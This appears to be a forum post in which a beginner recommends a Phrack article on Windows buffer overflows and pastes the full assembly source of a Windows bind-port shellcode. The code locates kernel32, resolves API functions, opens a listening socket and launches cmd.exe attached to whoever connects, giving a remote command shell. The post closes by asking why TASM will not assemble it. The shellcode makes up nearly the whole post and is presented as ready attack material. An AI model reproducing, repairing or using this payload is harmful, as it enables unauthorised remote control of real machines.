phrack 6.2's article on advances in windows overflow http://phrack.org/show.php?p=62&a=7
is great some really advance topics covered by it gives u examples on how to procede and source code available on http://www.scan-associates.net/papers/one-way.zip

i am new at asm never enjoyed it to be honest but in one-way.zip file there are source code in asm for shell codes here is one of those source codes:::

----------------------------------------------------------

;bind to port shellcode
;port at 0x134
;sk scan-associates net

.386p
locals
.model flat, stdcall

.code
start:

db 0ebh,02 ;jmp $+2
db 0ebh, 05h ;jmp $+5
db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7

pop eax
add eax, 1bh
lea esp,[eax-3ffh]
and esp, 0fffffffch
mov ebp,esp
xor ecx,ecx
mov cx,399 ;size
decode:
xor byte ptr [eax], 0
inc eax
loop decode
call here

db "GetProcAddress",0,"LoadLibraryA",0
db "CreateProcessA",0,"ExitProcess",0
db "ws2_32",0,"WSASocketA",0
db "bind",0,"listen",0,"accept",0
db "cmd",0
;Warning! This will not work in Win2k SP4! Check reverse.asm for a better trick to get Kernel32
here:
pop edx
push edx
mov ebx,77F00000h
l1:
cmp dword ptr [ebx],905A4Dh ;/x90ZM
je l2
;db 74h,03h
dec ebx
jmp l1
l2:
mov esi,dword ptr [ebx+3Ch]
add esi,ebx
mov esi,dword ptr [esi+78h]
add esi,ebx
mov edi,dword ptr [esi+20h]
add edi,ebx
mov ecx,dword ptr [esi+14h]
push esi
xor eax,eax
l4:
push edi
push ecx
mov edi,dword ptr [edi]
add edi,ebx
mov esi,edx
xor ecx,ecx
;GetProcAddress
mov cl,0Eh
repe cmps byte ptr [esi],byte ptr [edi]
pop ecx
pop edi
je l3
add edi,4
inc eax
loop l4
jmp ecx
l3:
pop esi
mov edx,dword ptr [esi+24h]
add edx,ebx
shl eax,1
add eax,edx
xor ecx,ecx
mov cx,word ptr [eax]
mov eax,dword ptr [esi+1Ch]
add eax,ebx
shl ecx,2
add eax,ecx
mov edx,dword ptr [eax]
add edx,ebx
pop esi
mov edi,esi
xor ecx,ecx
;Get 3 Addr
mov cl,3
call loadaddr
add esi,0Ch
;Load ws2_32
push edx
push esi
call dword ptr [edi-0Ch] ;LoadLibraryA
pop edx
mov ebx,eax
xor ecx,ecx
mov cl,4
call loadaddr
add esi,7
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call dword ptr [edi-16] ;WSASocketA
cmp eax,0FFFFFFFFh
je exit
;bind, listen, accept
mov ebx,eax
mov word ptr [ebp],2
mov word ptr [ebp+2],5000h ;port
mov dword ptr [ebp+4], 0 ;IP
push 10h
push ebp
push ebx
call dword ptr [edi-12] ;bind
test eax,eax
jne exit
inc eax
push eax
push ebx
call dword ptr [edi-8] ;listen (soc, 1);
test eax,eax
jne exit
push eax
push eax
push ebx
call dword ptr [edi-4] ;accept
cmp eax,0FFFFFFFFh
je exit
mov ebx,eax
xor eax,eax
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi]
pop edi
mov byte ptr [ebp],44h
mov dword ptr [ebp+3Ch],ebx
mov dword ptr [ebp+38h],ebx
mov dword ptr [ebp+40h],ebx
mov word ptr [ebp+2Ch],0101h
lea eax,[ebp+44h]
push eax
push ebp
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push esi
push ecx
call dword ptr [edi-24] ;CreateProcess
exit:
push eax
call dword ptr [edi-20] ;ExitProcess
loadaddr:
mov al,byte ptr [esi]
inc esi
test al,al
jne loadaddr
push ecx
push edx
push esi
push ebx
call edx
pop edx
pop ecx
stosd
loop loadaddr
ret

end start

.data
----------------------------------------------------------
it is supposed to be used with TASM i have windows 98 and XP installed tasm on 98 and tried all of these source codes tried to create obj file but it doesn't work can anyone suggest why?
may be it will work fine on linux but what if i want to convert this to windows or dos format.